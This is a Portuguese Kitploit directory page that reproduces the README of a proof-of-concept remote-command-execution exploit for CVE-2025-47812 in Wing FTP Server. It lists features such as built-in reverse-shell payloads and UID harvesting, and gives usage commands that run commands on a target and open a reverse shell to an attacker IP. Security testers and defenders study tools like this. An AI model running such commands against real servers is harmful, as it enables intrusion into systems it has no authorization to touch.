Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
WingFTP-CVE-2025-47812-illdeed — Exploit de Execução Remota de Comandos para o Wing FTP Server (CVE-2025-47812) | Kitploit
Ferramentas/GitHubGitHub/ill-deed/wingftp-cve-2025-47812-illdeed
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubill-deed/wingftp-cve-2025-47812-illdeed

WingFTP-CVE-2025-47812-illdeed

Exploit de Execução Remota de Comandos para o Wing FTP Server (CVE-2025-47812)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 1 anoAinda não revisado

CVE-2025-47812 - Exploit RCE do Wing FTP Server

Este repositório fornece um exploit de prova de conceito para CVE-2025-47812, uma vulnerabilidade de execução remota de comandos (RCE) no Wing FTP Server. Um atacante pode injetar e executar comandos arbitrários do sistema baseados em Lua abusando do parâmetro username durante a autenticação, resultando em execução remota total de código.


📌 Funcionalidades do Exploit

  • 🔧 Execução remota de comandos shell personalizados
  • 🧬 Múltiplos payloads de reverse shell embutidos (bash, Python, netcat, etc.)
  • 🪪 Extração automática de UID do Set-Cookie
  • 📦 Registra UIDs bem-sucedidos em found_uids.txt
  • 🧪 Modo dry-run (nenhuma requisição é enviada — teste sua lógica de entrada/saída com segurança)
  • 🔁 Lógica de repetição em falha de rede
  • 🧹 Formatação mais limpa do payload e saída legível
  • ✅ Validação de entrada para IPs, portas e URLs
  • ⚙️ Suporte a argumentos de linha de comando para fluxos de trabalho automatizados

💻 Uso

Execute um comando shell simples:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"

Dispare um reverse shell:

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444

Modo dry-run (nenhuma requisição será enviada):

root@kitploit:~
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run

🔄 Alterações Feitas no Exploit Original


⚠️ Aviso Legal

Este projeto é destinado apenas para testes de segurança educacionais e autorizados.
Não use esta ferramenta contra sistemas que você não possui ou para os quais não tem permissão explícita para testar.



Baixar ferramenta
Feature/ImprovementDescription
✅ Argument ParsingAdicionado suporte CLI argparse para modo não interativo
🔐 Input ValidationGarante URL/IP/porta válidos antes de tentar o exploit
📦 Header RefactoringExtraídos cabeçalhos HTTP para uma função reutilizável para consistência
📄 UID LoggingSalva tokens UID bem-sucedidos em found_uids.txt
🧪 Dry-Run ModePermite teste seguro sem enviar requisições (--dry-run)
🕒 Timeout + RetriesAdiciona timeout de requisição e tentativas automáticas de repetição em falha
🧼 Payload ReadabilityReformatada a string de injeção Lua para clareza e manutenção
📊 Structured OutputEmbrulhadas respostas do servidor e informações do payload com delimitadores para fácil leitura
⚠️ Status Code ChecksAvisa o usuário se o alvo retornar códigos de status HTTP inesperados
📝 Logging SystemSubstitui print() pelo módulo logging do Python para melhor controle de verbosidade